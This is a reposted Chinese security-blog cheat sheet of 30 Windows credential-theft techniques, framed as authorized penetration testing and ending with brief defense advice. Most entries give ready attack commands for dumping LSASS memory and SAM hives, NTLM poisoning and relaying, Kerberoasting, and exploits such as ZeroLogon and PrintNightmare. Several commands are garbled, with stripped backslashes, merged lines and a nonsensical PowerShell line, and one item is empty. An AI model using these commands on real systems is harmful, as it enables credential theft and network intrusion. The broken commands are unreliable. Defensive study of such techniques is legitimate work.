攻防实录:渗透测试人员必备的30种Windows凭证获取技巧!

admin
admin
admin
138633
文章
114
评论
2025年3月10日10:18:57评论34 views字数 2680阅读8分56秒阅读模式

在授权渗透测试中,密码凭证的获取往往是突破内网边界的关键。本文基于合规测试环境,系统梳理Windows系统密码获取的30种技术手段,同时配套防御方案。所有技术内容仅供安全研究使用,实施前必须取得合法授权。

一、内存凭证提取技术

1. LSASS进程内存解析

  • • 技术原理:利用Mimikatz的sekurlsa::logonpasswords模块提取登录会话
  • • 典型命令:privilege::debugsekurlsa::logonpasswords
  • • 防御方案:启用Credential Guard,限制本地管理员权限

2. 安全描述符转储

  • • 使用PowerShell调用Windows API读取LSASS句柄Get-Process lsass | Add-MemberTypeName Security.Descriptor

3. 进程镜像文件分析

  • • 创建LSASS进程完整dump文件procdump.exe -ma lsass.exe lsass.dmp

4. 非托管代码注入

  • • 通过C#反射加载Mimikatz的PE文件Assembly.Load(DecryptPEBytes()).EntryPoint.Invoke()

5. WDigest缓存提取

  • • 修改注册表强制启用WDigest缓存reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1

6. Kerberos票据分析

  • • 使用Rubeus导出当前会话的TGT票据Rubeus.exe dump /nowrap

7. DPAPI凭据解析

  • • 提取Chrome浏览器保存的密码SharpChrome.exe logins

8. 虚拟化环境内存取证

  • • 利用VMSS2Core转换虚拟机快照文件vmss2core -W12 vmss.vmem

二、本地存储凭证提取(7种)

9. SAM数据库破解

  • • 通过注册表提取哈希reg save HKLMSYSTEM system.hivreg save HKLMSAM sam.hiv

10. LSA Secrets解析

  • • 使用PsExec获取Secrets数据psexec.exe -s -i regedit.exe

11. 组策略首选项漏洞

  • • 解密cpassword字段gpp-decrypt ED4C7D3FE97C3B42

12. 计划任务凭据残留

  • • 解析XML文件中的RunAsUser字段Get-ScheduledTask | Select-Object TaskName,Principal

13. IIS应用程序池配置

  • • 解密applicationHost.config中的密码aspnet_regiis -pdf "connectionStrings" .

14. 远程桌面凭据管理器

  • • 使用cmdkey列出保存的凭据cmdkey /list

15. PowerShell历史记录审计

  • • 检索控制台历史文件Get-Content (Get-PSReadlineOption).HistorySavePath

三、网络协议攻击(5种)

16. LLMNR/NBT-NS投毒

  • • 使用Responder捕获NetNTLMv2哈希python Responder.py -I eth0 -wFb

17. SMB中继攻击

  • • 配置ntlmrelayx进行哈希转发ntlmrelayx.py -tf targets.txt -smb2support

18. Kerberoasting攻击

  • • 请求服务票据进行离线破解GetUserSPNs.py -request 'domain/user:password'

19. AS-REP Roasting

  • • 提取不需要预认证的用户哈希Rubeus.exe asreproast /format:hashcat

20. RDP会话劫持

  • • 利用tscon服务进行会话接管query usertscon %ID% /dest:%SESSIONNAME%

四、漏洞利用技术(5种)

21. ZeroLogon(CVE-2020-1472)

  • • 重置域控机器账户密码zerologon_tester.py dc_name 192.168.1.1

22. PrintNightmare(CVE-2021-1675)

  • • 通过打印机服务提权python3 CVE-2021-1675.py -u user -p password -d domain 192.168.1.1

23. PetitPotam(CVE-2021-36942)

  • • 强制域控认证python3 petitpotam.py -d domain -u user -p password 192.168.1.1 192.168.1.2

24. SAM账户名混淆(CVE-2021-42278)

  • • 创建伪造的域控账户sam_the_admin.py -domain lab.com -dc-ip 192.168.1.1

25. MS14-068 Kerberos漏洞

五、其他高级技术(5种)

26. 域控数据库提取

  • • 使用ntdsutil创建快照ntdsutil "ac i ntds" "ifm" "create full C:temp" q q

27. 组策略脚本审计

  • • 检索所有GPO中的登录脚本Get-GPO -All | Get-GPOReport -ReportType XML

28. WMI永久事件订阅

  • • 创建密码记录触发器__EventFilter和__EventConsumer绑定

29. 卷影副本分析

  • • 通过VSS访问历史文件vssadmin list shadowsmklink /d C:shadowcopy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

30. BitLocker恢复密钥提取

  • • 从AD中获取恢复密钥Get-ADObject -Filter {objectclass -eq 'msFVE-RecoveryInformation'}

【防御建议】

  1. 1. 启用LSA保护(RunAsPPL)
  2. 2. 部署Windows Defender Credential Guard
  3. 3. 强制实施NTLM禁用策略
  4. 4. 定期审计域控事件日志(ID 4662)
  5. 5. 实施JEA(Just Enough Administration)权限模型
  6. 6. 配置Kerberos AES加密强制策略
  7. 7. 部署网络访问控制(802.1X)
  8. 8. 启用Windows事件转发集中收集

原文始发于微信公众号(HACK之道):攻防实录:渗透测试人员必备的30种Windows凭证获取技巧!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月10日10:18:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防实录:渗透测试人员必备的30种Windows凭证获取技巧!https://cn-sec.com/archives/3820997.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息